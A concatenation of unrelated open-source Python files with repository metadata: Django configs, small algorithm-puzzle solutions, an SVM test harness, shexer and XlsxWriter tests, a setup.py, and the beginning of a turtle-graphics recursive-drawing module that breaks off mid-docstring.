53bd002833d9a292adb9fc9597fcf51a13a3e702 | ff7d3116024c9df01b94191ddfa334e4a6782ae6 | /mandal/asgi.py | b5b92dc813812b64f6029c072cbb314048f69a23 | [ "MIT" ] | permissive | jhnnsrs/arbeider | f5f708ee1026a9e9573a6f8a87c3b9e2fd6b5e33 | 4c5637913331c998a262ae0deca516b236845200 | refs/heads/master | 2021-05-26T10:31:16.279628 | 2020-04-08T13:40:26 | 2020-04-08T13:40:26 | 254,095,863 | 0 | 0 | MIT | 2020-04-08T13:40:28 | 2020-04-08T13:29:31 | null | UTF-8 | Python | false | false | 318 | py |
"""
ASGI entrypoint. Configures Django and then runs the application
defined in the ASGI_APPLICATION setting.
"""
import os
import django
from channels.routing import get_default_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mandal.settings")
django.setup()
application = get_default_application()
| [ "[email protected]" ] | |
16573c15b3817ed9f64b13f466428536b50da9d6 | 5b4312ddc24f29538dce0444b7be81e17191c005 | /autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/generate_cached_setup.py | 01cfc657005e5167ef4e8abd08b42b76f522be17 | [ "MIT" ] | permissive | muyangren907/autoware | b842f1aeb2bfe7913fb2be002ea4fc426b4e9be2 | 5ae70f0cdaf5fc70b91cd727cf5b5f90bc399d38 | refs/heads/master | 2020-09-22T13:08:14.237380 | 2019-12-03T07:12:49 | 2019-12-03T07:12:49 | 225,167,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,929 | py |
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
    sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
    from catkin.environment_cache import generate_environment_script
except ImportError:
    # search for catkin package in all workspaces and prepend to path
    for workspace in "/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_health_checker;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/amathutils_lib;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/tablet_socket_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_system_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_config_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_build_flags;/opt/ros/melodic".split(';'):
        python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
        if os.path.isdir(os.path.join(python_path, 'catkin')):
            sys.path.insert(0, python_path)
            break
    from catkin.environment_cache import generate_environment_script

code = generate_environment_script('/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/devel/env.sh')

output_filename = '/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
    # print('Generate script for cached setup "%s"' % output_filename)
    f.write('\n'.join(code))

mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [ "[email protected]" ] | |
4ff946b307a86955672b905e0806efb85572c652 | 198f759dc334df0431cbc25ed4243e86b93571eb | /drop/wsgi.py | 0dbf4b2caf4a9cd90fadce8e2d1d88950fcb3cfe | [] | no_license | miladhzz/django-muliple-db | ec2074b14dd67a547c982f20b2586f435e7e0d6c | 56ff2555e498d9105cad215daf4c3d4da59d7d9a | refs/heads/master | 2022-12-25T08:08:05.761226 | 2020-10-06T06:38:30 | 2020-10-06T06:38:30 | 301,636,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py |
"""
WSGI config for drop project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'drop.settings')
application = get_wsgi_application()
| [ "[email protected]" ] | |
0a8b93c86f1f59ac957d675eef30b726dc06c777 | 52a4d869976a97498bdf56a8d0ff92cac138a136 | /Algorithmic Heights/rosalind_3_degarray.py | 1ed82de8791f3769afe522fe22c1bee1abb2a87e | [] | no_license | aakibinesar/Rosalind | d726369a787d848cc378976b886189978a60a3a5 | 375bbdbfb16bf11b2f980701bbd0ba74a1605cdb | refs/heads/master | 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null | UTF-8 | Python | false | false | 380 | py |
file = open('rosalind_deg.txt','r').readlines()
vertices, edges = (int(val) for val in file[0].split())
my_data = [[int(val) for val in line.split()] for line in file[1:]]
count = 0
L = []
for k in range(1, vertices+1):
    count = 0
    for i in range(2):
        for j in range(0, edges):
            if my_data[j][i] == k:
                count += 1
    L.append(count)
print(' '.join(str(num) for num in L))
| [ "[email protected]" ] | |
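# Added worked example of the Rosalind DEG input format this script expects
# (first line: vertex and edge counts; then one edge per line):
#
#   rosalind_deg.txt:    output:
#   3 2                  1 2 1
#   1 2
#   2 3
#
# (vertex 2 appears in both edges, vertices 1 and 3 in one each)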
3e677c83fd12cc5c2661147aa8b3dca9d0b689e4 | 15c4278a1a70ad3c842b72cba344f96fca43f991 | /newpro/newapp/admin.py | 37dac0ac21c8bfb1c6e0d008a060f3977faa28a0 | [] | no_license | nivyashri05/Task1 | d9914cf5bb8947ef00e54f77480c6f5f375c76ad | 9e9b03961eb1144d1b1a936159082ad80d32ce31 | refs/heads/master | 2023-01-06T01:04:17.321503 | 2020-11-10T15:31:02 | 2020-11-10T15:31:02 | 311,691,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from newapp.models import User
class UserAdmin(BaseUserAdmin):
list_display = ('email','username','phone','is_admin','is_staff','timestamp')
search_fields = ('email','username',)
readonly_fields=('date_joined', 'last_login')
filter_horizontal = ()
list_filter = ()
fieldsets = ()
admin.site.register(User, BaseUserAdmin)
| [
"[email protected]"
] | |
16d4ac62c0efe8567434b83a272a3035cd8c8990 | d75371f629cf881de3c49b53533879a5b862da2e | /python/search-a-2d-matrix.py | 3ce6ce1d52b91816fccec4a1e5592f5c548b2cf5 | [] | no_license | michaelrbock/leet-code | 7352a1e56429bb03842b588ba6bda2a90315a2f4 | 070db59d4e0ded3fb168c89c3d73cb09b3c4fe86 | refs/heads/master | 2020-04-01T05:40:49.262575 | 2019-10-10T22:03:10 | 2019-10-10T22:03:10 | 152,914,631 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,614 | py | def binary_row(rows, target):
if len(rows) == 1:
return 0, None
if len(rows) == 2:
return (1, None) if target >= rows[1] else (0, None)
lo = 0
hi = len(rows)
while lo < hi:
mid = (lo + hi) // 2
if rows[mid] == target:
return mid, True
if mid == len(rows) - 1:
return len(rows) - 1, None
if rows[mid] < target and rows[mid + 1] > target:
return mid, None
elif target > rows[mid]:
lo = mid
else:
hi = mid
return len(rows) - 1, None
def binary_search(lst, target):
if not lst:
return False
if len(lst) == 1:
return lst[0] == target
lo = 0
hi = len(lst)
while lo <= hi:
mid = (lo + hi) // 2
if lst[mid] == target:
return True
elif target > lst[mid]:
if lo == mid:
break
lo = mid
elif target < lst[mid]:
hi = mid
return False
class Solution1:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0] or matrix[0][0] > target:
return False
row, result = binary_row([row[0] for row in matrix], target)
if result is not None:
return result
return binary_search(matrix[row], target)
def _translate(index, rows, cols):
"""Returns (row, col) for overall index."""
row = index // cols
col = index % cols
return row, col
class Solution:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0]:
return False
# Strategy: binary search, but treat the matrix as if
# it was one long array. Translate overall index into
# row/col indices.
m, n = len(matrix), len(matrix[0]) # num row, num cols
start = 0 # indices as if matrix was one long list
end = m * n - 1 # incluive
while start <= end and start >= 0 and end < m * n:
mid = (start + end) // 2
row, col = _translate(mid, m, n)
if target == matrix[row][col]:
return True
elif target > matrix[row][col]:
start = mid + 1
else: # target < matrix[row][col]
end = mid - 1
return False
s = Solution()
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
assert s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 3)
assert not s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 13)
assert not s.searchMatrix([[1, 1]], 0)
assert not s.searchMatrix([[1, 1]], 2)
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
print('All tests passed!')
| [ "[email protected]" ] | |
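# Added check of the index translation used by Solution.searchMatrix: in a 3x4
# matrix, overall index 5 maps to row 5 // 4 == 1 and column 5 % 4 == 1.
#
#   assert _translate(5, 3, 4) == (1, 1)
#   assert _translate(11, 3, 4) == (2, 3)   # last cell of the matrix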
8f9842cabc131fddc1025c2ab9121b0af86a3297 | d9a65120e6b8d20d3b568acde8ceb66f908d1ffc | /django1/src/vote/urls.py | 68755a03d624470c3b5e239836982709943bda16 | [] | no_license | omniverse186/django1 | aba57d705bd7b3a142f627e566853811038d6d6c | f257c34c9d09467170a5f3bd24598d97dcf64f4f | refs/heads/master | 2020-04-21T23:11:17.677609 | 2019-02-10T03:20:47 | 2019-02-10T03:20:47 | 169,938,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py |
'''
Created on 2019. 1. 20.

@author: user
'''
# (Translated from Korean) Sub (app-level) URLConf
# app_name : the group name for the URLs registered in this sub URLConf file
# urlpatterns : the variable that registers URLs and view functions as a list
from django.urls import path
from .views import *

app_name = 'vote'
urlpatterns = [
    # name : assigns an alias to the registered URL / view function
    path('', index, name='index'),
    path('<int:q_id>/', detail, name='detail'),
    path('vote/', vote, name='vote'),
    path('result/<int:q_id>', result, name='result'),
    path('qr/', qregister, name='qr'),
    path('qu/<int:q_id>/', qupdate, name='qu'),
    path('qd/<int:q_id>/', qdelete, name='qd'),
    path('cr/', cregister, name='cr'),
    path('cu/<int:c_id>/', cupdate, name='cu'),
    path('cd/<int:c_id>/', cdelete, name='cd')
]
| [ "user@DESKTOP-37GULAI" ] | user@DESKTOP-37GULAI |
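# Added note: because app_name = 'vote' is set above, these routes are reversed
# through the namespace using the standard Django API, e.g.:
#
#   from django.urls import reverse
#   reverse('vote:detail', args=[1])   # resolves the detail route for q_id=1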
1c98f010be779b0df3ae626d838b4e5e5e86525c | d24e06a9fb04ada28de067be1b6be50a7a92f294 | /Assignment1/svm_test.py | c916d079fcf86ddccff119130ecb3486e4f6dee4 | [] | no_license | sentientmachine/CS7641 | 3960b3e216f1eddc9a782318a9bf3ae38fed1959 | a9a1369acfdd3e846e311c64498a38c8afd8fcc2 | refs/heads/master | 2020-12-25T03:11:46.621886 | 2017-12-24T12:24:14 | 2017-12-24T12:24:14 | 51,779,034 | 0 | 0 | null | 2016-02-15T19:17:10 | 2016-02-15T19:17:10 | null | UTF-8 | Python | false | false | 4,649 | py |
import io
import pydotplus
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler, OneHotEncoder, Imputer
#from sklearn.metrics import accuracy_score
from plot_curves import *


class rb_svm_test:

    def __init__(self, x_train, x_test, y_train, y_test, x_col_names, data_label, cv):
        self.x_train = x_train
        self.x_test = x_test
        self.y_train = y_train
        self.y_test = y_test
        self.x_col_names = x_col_names
        self.data_label = data_label
        self.cv = cv

    def run_cv_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
        # use k-fold cross validation
        # we need to standardize the data for the SVM learner
        pipe_clf = Pipeline([('scl', StandardScaler()),
                             ('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
        # resample the test data without replacement. This means that each data point is part of a test and
        # training set only once. (paraphrased from Raschka p.176). In Stratified KFold, the features are
        # evenly distributed such that each test and training set is an accurate representation of the whole
        # this is the 0.17 version
        #kfold = StratifiedKFold(y=self.y_train, n_folds=self.cv, random_state=0)
        # this is the 0.18dev version (the constructor argument was renamed to n_splits)
        skf = StratifiedKFold(n_splits=self.cv, random_state=0)
        # do the cross validation
        train_scores = []
        test_scores = []
        #for k, (train, test) in enumerate(kfold):
        for k, (train, test) in enumerate(skf.split(X=self.x_train, y=self.y_train)):
            # run the learning algorithm
            pipe_clf.fit(self.x_train[train], self.y_train[train])
            train_score = pipe_clf.score(self.x_train[test], self.y_train[test])
            train_scores.append(train_score)
            test_score = pipe_clf.score(self.x_test, self.y_test)
            test_scores.append(test_score)
            print('Fold:', k+1, ', Training score:', train_score, ', Test score:', test_score)
        train_score = np.mean(train_scores)
        print('Training score is', train_score)
        test_score = np.mean(test_scores)
        print('Test score is', test_score)
        if do_plot:
            self.__plot_learning_curve(pipe_clf)
        return train_score, test_score

    def run_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
        # we need to standardize the data for the learner
        pipe_clf = Pipeline([('scl', StandardScaler()),
                             ('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
        # test it: this should match the non-pipelined call
        pipe_clf.fit(self.x_train, self.y_train)
        # check model accuracy
        train_score = pipe_clf.score(self.x_train, self.y_train)
        print('Training score is', train_score)
        test_score = pipe_clf.score(self.x_test, self.y_test)
        print('Test score is', test_score)
        if do_plot:
            self.__plot_learning_curve(pipe_clf)
            self.__plot_decision_boundaries(pipe_clf)
        return train_score, test_score

    def __plot_learning_curve(self, estimator):
        plc = rb_plot_curves()
        plc.plot_learning_curve(estimator, self.x_train, self.y_train, self.cv, self.data_label)

    def plot_validation_curve(self, C=1.0, degree=3, cache_size=200):
        estimator = Pipeline([('scl', StandardScaler()),
                              ('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
        param_names = ['clf__C']
        param_ranges = [np.arange(1.0, 10.0, 1.)]
        data_label = self.data_label
        plc = rb_plot_curves()
        for i in range(len(param_names)):
            param_name = param_names[i]
            param_range = param_ranges[i]
            plc.plot_validation_curve(estimator, self.x_train, self.y_train,
                                      self.cv, data_label,
                                      param_range, param_name)

    def __plot_decision_boundaries(self, estimator):
        plc = rb_plot_curves()
        features = pd.DataFrame(self.x_train)
        features.columns = self.x_col_names
        plc.plot_decision_boundaries(estimator, features, self.y_train, self.data_label)
| [ "=" ] | = |
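# Added usage sketch with stand-in data (rb_plot_curves comes from the course's
# plot_curves module, which is not shown here):
#
#   from sklearn.datasets import load_iris
#   from sklearn.model_selection import train_test_split
#   X, y = load_iris(return_X_y=True)
#   x_tr, x_te, y_tr, y_te = train_test_split(X, y, stratify=y, random_state=0)
#   tester = rb_svm_test(x_tr, x_te, y_tr, y_te,
#                        ['sepal_l', 'sepal_w', 'petal_l', 'petal_w'], 'iris', cv=5)
#   tester.run_cv_model(C=1.0, do_plot=False)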
a688ca2e222977722e0df277f47979059d2e8e1b | 99eb4013a12ddac44042d3305a16edac1c9e2d67 | /test/test_raw_shape_map.py | 1a6b72fc298a5b35beaa25426e64cdf336fc34fa | [ "Apache-2.0" ] | permissive | DaniFdezAlvarez/shexer | cd4816991ec630a81fd9dd58a291a78af7aee491 | 7ab457b6fa4b30f9e0e8b0aaf25f9b4f4fcbf6d9 | refs/heads/master | 2023-05-24T18:46:26.209094 | 2023-05-09T18:25:27 | 2023-05-09T18:25:27 | 132,451,334 | 24 | 2 | Apache-2.0 | 2023-05-03T18:39:57 | 2018-05-07T11:32:26 | Python | UTF-8 | Python | false | false | 4,212 | py |
import unittest
from shexer.shaper import Shaper
from test.const import G1, BASE_FILES, default_namespaces
from test.t_utils import file_vs_str_tunned_comparison
import os.path as pth
from shexer.consts import TURTLE
_BASE_DIR = BASE_FILES + "shape_map" + pth.sep
class TestRawShapeMap(unittest.TestCase):
    def test_node(self):
        shape_map = "<http://example.org/Jimmy>@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
                                                      str_target=str_result))

    def test_prefixed_node(self):
        shape_map = "ex:Jimmy@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
                                                      str_target=str_result))

    def test_focus(self):
        shape_map = "{FOCUS a foaf:Person}@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
                                                      str_target=str_result))

    def test_focus_wildcard(self):
        shape_map = "{FOCUS foaf:name _}@<WithName>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_and_wildcard.shex",
                                                      str_target=str_result))

    def test_sparql_selector(self):
        shape_map = "SPARQL \"select ?p where { ?p a foaf:Person }\"@<Person>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
                                                      str_target=str_result))

    def test_several_shapemap_items(self):
        shape_map = "{FOCUS a foaf:Person}@<Person>\n{FOCUS a foaf:Document}@<Document>"
        shaper = Shaper(graph_file_input=G1,
                        namespaces_dict=default_namespaces(),
                        all_classes_mode=False,
                        input_format=TURTLE,
                        disable_comments=True,
                        shape_map_raw=shape_map
                        )
        str_result = shaper.shex_graph(string_output=True)
        self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "several_shm_items.shex",
                                                      str_target=str_result))
| [ "[email protected]" ] | |
3e034a11bde11aa6a40bca38c774c9dba4dc8ef4 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_chart_format07.py | 45e9369b2bac7462c137134173b1cda4559f1696 | [ "BSD-2-Clause-Views" ] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,582 | py |
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#

from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook


class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.

    """

    def setUp(self):
        self.set_filename('chart_format07.xlsx')

    def test_create_file(self):
        """Test the creation of an XlsxWriter file with chart formatting."""

        workbook = Workbook(self.got_filename)

        worksheet = workbook.add_worksheet()
        chart = workbook.add_chart({'type': 'line'})

        chart.axis_ids = [46163840, 46175360]

        data = [
            [1, 2, 3, 4, 5],
            [2, 4, 6, 8, 10],
            [3, 6, 9, 12, 15],
        ]

        worksheet.write_column('A1', data[0])
        worksheet.write_column('B1', data[1])
        worksheet.write_column('C1', data[2])

        chart.add_series({
            'categories': '=Sheet1!$A$1:$A$5',
            'values': '=Sheet1!$B$1:$B$5',
            'marker': {
                'type': 'square',
                'size': 5,
                'line': {'color': 'yellow'},
                'fill': {'color': 'red'},
            },
        })

        chart.add_series({
            'categories': '=Sheet1!$A$1:$A$5',
            'values': '=Sheet1!$C$1:$C$5',
        })

        worksheet.insert_chart('E9', chart)

        workbook.close()

        self.assertExcelEqual()
| [ "[email protected]" ] | |
35eada1e6e31e47d1156a2dd8c85c2aada530ebe | 4fbd844113ec9d8c526d5f186274b40ad5502aa3 | /algorithms/python3/pacific_atlantic_water_flow.py | 6a5e0384ee2afe8a2dd84a801719431deeaa3b09 | [] | no_license | capric8416/leetcode | 51f9bdc3fa26b010e8a1e8203a7e1bcd70ace9e1 | 503b2e303b10a455be9596c31975ee7973819a3c | refs/heads/master | 2022-07-16T21:41:07.492706 | 2020-04-22T06:18:16 | 2020-04-22T06:18:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py |
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an m x n matrix of non-negative integers representing the height of each unit cell in a continent, the "Pacific ocean" touches the left and top edges of the matrix and the "Atlantic ocean" touches the right and bottom edges.
Water can only flow in four directions (up, down, left, or right) from a cell to another one with height equal or lower.
Find the list of grid coordinates where water can flow to both the Pacific and Atlantic ocean.
Note:
The order of returned grid coordinates does not matter.
Both m and n are less than 150.
Example:
Given the following 5x5 matrix:
Pacific ~ ~ ~ ~ ~
~ 1 2 2 3 (5) *
~ 3 2 3 (4) (4) *
~ 2 4 (5) 3 1 *
~ (6) (7) 1 4 5 *
~ (5) 1 1 2 4 *
* * * * * Atlantic
Return:
[[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with parentheses in above matrix).
"""
""" ==================== body ==================== """
class Solution:
    def pacificAtlantic(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: List[List[int]]
        """
""" ==================== body ==================== """
| [ "[email protected]" ] | |
93117ac33ad6602c755054bba6d85d4308a19d77 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /L7NK7McEQ9yEpTXRE_16.py | d1817c7d7db4293f1356e203513e2932567c3783 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py |
def XOR(a, b):
a = a ^ b
b = a ^ b
a = a ^ b
return [a,b]
| [
"[email protected]"
] | |
39f51b8befba9f505afddabff3d6d21823fa7df5 | adb759899204e61042225fabb64f6c1a55dac8ce | /1900~1999/1904.py | 8a490e0cc71ac769e26193e2bc6f97c4d01e51cb | [] | no_license | geneeol/baekjoon-online-judge | 21cdffc7067481b29b18c09c9152135efc82c40d | 2b359aa3f1c90f178d0c86ce71a0580b18adad6f | refs/heads/master | 2023-03-28T23:25:12.219487 | 2021-04-01T09:19:06 | 2021-04-01T09:19:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,478 | py | # 문제
# 지원이에게 2진 수열을 가르쳐 주기 위해, 지원이 아버지는 그에게 타일들을 선물해주셨다.
# 그리고 이 각각의 타일들은 0 또는 1이 쓰여 있는 낱장의 타일들이다.
# 어느 날 짓궂은 동주가 지원이의 공부를 방해하기 위해 0이 쓰여진 낱장의 타일들을 붙여서 한 쌍으로 이루어진 00 타일들을 만들었다.
# 결국 현재 1 하나만으로 이루어진 타일 또는 0타일을 두 개 붙인 한 쌍의 00타일들만이 남게 되었다.
# 그러므로 지원이는 타일로 더 이상 크기가 N인 모든 2진 수열을 만들 수 없게 되었다.
# 예를 들어, N=1일 때 1만 만들 수 있고, N=2일 때는 00, 11을 만들 수 있다. (01, 10은 만들 수 없게 되었다.)
# 또한 N=4일 때는 0011, 0000, 1001, 1100, 1111 등 총 5개의 2진 수열을 만들 수 있다.
# 우리의 목표는 N이 주어졌을 때 지원이가 만들 수 있는 모든 가짓수를 세는 것이다.
# 단 타일들은 무한히 많은 것으로 가정하자.
#
# 입력
# 첫 번째 줄에 자연수 N이 주어진다.(N ≤ 1,000,000)
#
# 출력
# 첫 번째 줄에 지원이가 만들 수 있는 길이가 N인 모든 2진 수열의 개수를 15746으로 나눈 나머지를 출력한다.
N = int(input())
MOD = 15746
dp = [0 for _ in range(1000001)]
dp[1], dp[2], dp[3] = 1, 2, 3
for i in range(4, 1000001):
dp[i] = (dp[i - 1] + dp[i - 2]) % MOD
print(dp[N])
| [
"[email protected]"
] | |
bd0aee949be51e9122bd5c53c9a3f1bed2200067 | 1865a8508bed279961abaef324b434c0e3caa815 | /setup.py | 261fb583f89174f98ea47d3f5b9b3cadf5e81b6b | [ "MIT" ] | permissive | zidarsk8/simple_wbd | de68cbefe94fda52ed5330ff55b97b4a73aedfb4 | 6c2d1611ffd70d3bf4468862b0b569131ef12d94 | refs/heads/master | 2021-01-19T10:54:38.824763 | 2016-08-16T03:58:42 | 2016-08-16T03:58:42 | 59,942,658 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,866 | py |
#!/usr/bin/env python3
"""Simplo wbd setup file.
This is the main setup for simple wbd. To manually install this module run:
$ pip install .
For development to keep track of the changes in the module and to include
development and test dependecies run:
$ pip install --editable .[dev,test]
"""
from setuptools import setup
def get_description():
with open("README.rst") as f:
return f.read()
if __name__ == "__main__":
setup(
name="simple_wbd",
version="0.5.1",
license="MIT",
author="Miha Zidar",
author_email="[email protected]",
description=("A simple python interface for World Bank Data Indicator "
"and Climate APIs"),
long_description=get_description(),
url="https://github.com/zidarsk8/simple_wbd",
download_url="https://github.com/zidarsk8/simple_wbd/tarball/0.5.1",
packages=["simple_wbd"],
provides=["simple_wbd"],
install_requires=[
"pycountry"
],
extras_require={
"dev": [
"pylint"
],
"test": [
"codecov",
"coverage",
"mock",
"nose",
"vcrpy",
],
},
test_suite="tests",
keywords = [
"World Bank Data",
"indicator api",
"climate api",
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering",
],
)
| [ "[email protected]" ] | |
88ae046695faa97023e4952c85ae2915a6475290 | b1480f77540258ec08c9c35866138bfec839d7d0 | /src/drostedraw/__init__.py | 926f411cf29c3ff970f86b4bedac15a10a608353 | [ "MIT" ] | permissive | asweigart/drostedraw | 1fd69cac3659eaeebf8179f8015989b5d572c55b | d2a3620a4d2bda6fb76321883a3c9587abf6cec4 | refs/heads/main | 2023-08-04T18:23:21.586862 | 2021-09-14T17:35:00 | 2021-09-14T17:35:00 | 397,367,988 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,584 | py |
"""Droste Draw
By Al Sweigart [email protected]
A Python module for making recursive drawings (aka Droste effect) with the built-in turtle module."""
__version__ = '0.2.1'
import turtle, math
MAX_FUNCTION_CALLS = 10000 # Stop recursion after this many function calls.
MAX_ITERATION = 400 # Stop recursion after this iteration.
MIN_SIZE = 1 # Stop recursion if size is less than this.
# NOTE: In general, don't use absolute coordinate functions (like turtle.goto(), turtle.xcor(), turtle.ycor(),
# turtle.setheading()) in your draw functions because they might not work when the heading angle is not 0.
def drawSquare(size, extraData=None):
"""Draw a square where `size` is the length of each side."""
# Move the turtle to the top-right corner before drawing:
turtle.penup()
turtle.forward(size // 2) # Move to the right edge.
turtle.left(90) # Turn to face upwards.
turtle.forward(size // 2) # Move to the top-right corner.
turtle.left(180) # Turn around to face downwards.
turtle.pendown()
# Draw the four sides of a square:
for i in range(4):
turtle.forward(size)
turtle.right(90)
def drawTriangle(size, extraData=None):
"""Draw an equilateral triangle where `size` is the length of
each side."""
# Move the turtle to the top of the equilateral triangle:
height = (size * math.sqrt(3)) / 2
turtle.penup()
turtle.left(90) # Turn to face upwards.
turtle.forward(height * (2/3)) # Move to the top corner.
turtle.right(150) # Turn to face the bottom-right corner.
turtle.pendown()
# Draw the three sides of the triangle:
for i in range(3):
turtle.forward(size)
turtle.right(120)
def drawFilledSquare(size, extraData=None):
"""Draw a solid, filled-in square where `size` is the length of each
side. The extraData dictionary can have a key 'colors' whose value
is a list of "color strings" that the turtle module recognizes, e.g.
'red', 'black', etc. The first color string in the list is used
for the first iteration, the second for the second, and so on. When
you run out of colors for later iterations, the first color is used
again."""
# Move the turtle to the top-right corner before drawing:
turtle.penup()
turtle.forward(size // 2) # Move to the right edge.
turtle.left(90) # Turn to face upwards.
turtle.forward(size // 2) # Move to the top-right corner.
turtle.left(180) # Turn around to face downwards.
turtle.pendown()
    # extraData['colors'] supplies the palette; pick a color by iteration:
    if extraData is not None and 'colors' in extraData:
iteration = extraData['_iteration'] - 1 # -1 because iteration starts at 1, not 0.
turtle.fillcolor(extraData['colors'][iteration % len(extraData['colors'])])
turtle.pencolor(extraData['colors'][iteration % len(extraData['colors'])])
# Draw the four sides of a square:
turtle.begin_fill()
for i in range(4):
turtle.forward(size)
turtle.right(90)
turtle.end_fill()
def drawFilledDiamond(size, extraData=None):
    """Draw a solid, filled-in diamond (a square rotated 45 degrees) where
